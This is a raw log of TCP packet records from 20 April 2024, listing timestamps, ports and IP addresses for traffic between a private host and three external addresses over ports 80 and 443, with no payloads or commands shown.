Apr 20, 2024 11:35:59.097776890 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097776890 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097798109 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097820044 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097871065 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.098634005 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.098686934 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.098699093 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.098735094 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.098773003 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.098809958 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.098896980 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.098896980 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.098896980 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.098896980 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.099315882 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.844491959 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:35:59.844569921 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:35:59.844654083 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:35:59.863225937 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:35:59.863265991 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.023638010 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:00.099987984 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.100070953 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.110421896 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.110443115 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.111363888 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.111428022 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.209908009 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.256149054 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.461719036 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.461806059 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.461864948 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.461927891 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.461941957 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.461996078 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.462007046 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.462057114 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.462089062 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.462145090 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.462205887 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.462264061 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.462316990 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.462373018 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.462414980 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.462466955 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.485752106 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.485826969 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.485855103 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.485914946 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486017942 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.486078024 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486129045 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.486186981 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486257076 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.486308098 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486321926 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.486377001 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486440897 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:00.486495972 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486799002 CEST	49162	443	192.168.2.22	104.21.84.67
Apr 20, 2024 11:36:00.486830950 CEST	443	49162	104.21.84.67	192.168.2.22
Apr 20, 2024 11:36:03.214798927 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.214883089 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.214962959 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.219367027 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.219389915 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.451487064 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.451591015 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.456887960 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.456916094 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.457408905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.515417099 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.560112000 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701028109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701165915 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701241970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.701303005 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701417923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701476097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.701491117 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701617002 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701668024 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.701683044 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701788902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701841116 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.701854944 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.701984882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702035904 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.702048063 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702148914 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702209949 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.702223063 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702316046 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702368975 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.702382088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702477932 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702528000 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.702543020 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702740908 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702794075 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.702805996 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702927113 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.702979088 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.702991009 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703089952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703145981 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.703159094 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703708887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703769922 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.703782082 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703875065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703952074 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.703962088 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.703993082 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.704051018 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.704082012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.704619884 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.704679966 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.704694986 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.704802036 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.704868078 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.704880953 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.704977989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.705037117 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.705049038 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.705502987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.705555916 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.705568075 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.705665112 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.705715895 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.705729008 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.706280947 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.706331015 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.706343889 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.706482887 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.706547022 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.706559896 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806164980 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806240082 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.806277990 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806397915 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806421041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806463957 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.806482077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806541920 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.806822062 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806847095 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806883097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.806929111 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.806993008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.807007074 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.807255030 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.807320118 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.807333946 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.808186054 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.808250904 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.808264017 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.808290958 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.808342934 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.808356047 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.809165001 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.809226036 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.809238911 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.809267998 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.809324026 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.809336901 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.810076952 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.810142040 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.810156107 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.810178995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.810230970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.810245037 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.811029911 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.811108112 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.811121941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.811145067 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.811197042 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.811211109 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.852519035 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.852595091 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.852613926 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.852650881 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.852711916 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.852725029 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.852782011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.852843046 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.852870941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.908791065 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.908866882 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.908890963 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.909982920 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.910048008 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.910063028 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.910233974 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.910306931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.910322905 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.910356045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.910406113 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.910418987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.911151886 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.911211014 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.911226034 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912033081 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912091970 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.912120104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912153959 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912209988 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.912224054 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912749052 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912813902 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.912827015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912852049 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.912905931 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.912918091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.913636923 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.913701057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.913712978 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.913737059 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.913790941 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.913804054 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.914535999 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.914598942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.914604902 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.914637089 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.914678097 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.915354967 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.915412903 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.915431023 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.916425943 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.916497946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.916512012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.916564941 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.916618109 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.916631937 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.916657925 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.916765928 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.916779995 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.917296886 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.917356968 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.917383909 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.917407990 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.917459011 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.917473078 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.918169975 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.918236971 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.918250084 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.919063091 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.919126034 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.919138908 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.919162989 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.919214964 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.919226885 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.920146942 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.920198917 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.920217037 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.920233011 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.920267105 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.922785997 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.922852039 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.922867060 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.922885895 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.922916889 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.924581051 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.924660921 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.924666882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.924699068 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.924736023 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.926335096 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.926413059 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.926414967 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.926439047 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.926481962 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.928472996 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.928539991 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.928541899 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.928566933 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.928611994 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.956516981 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.956602097 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.956608057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.956626892 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.956666946 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.957679987 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.957741976 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.957752943 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.957776070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.957830906 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.959408045 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.959482908 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.959482908 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:03.959498882 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:03.959542990 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.014019012 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.014117956 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.014125109 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.014172077 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.014194012 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.015707016 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.015774965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.015783072 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.015810966 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.015845060 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.017513037 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.017585039 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.017585993 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.017611027 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.017653942 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.019212961 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.019278049 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.019298077 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.019318104 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.019350052 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.021008015 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.021074057 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.021084070 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.021111965 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.021157980 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.023169041 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.023233891 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.023256063 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.023273945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.023313046 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.024898052 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.024975061 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.024976969 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.025007963 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.025053978 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.026644945 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.026722908 CEST	49163	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:04.026726007 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.026748896 CEST	443	49163	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:04.026787043 CEST	49163	443	192.168.2.22	172.67.215.45
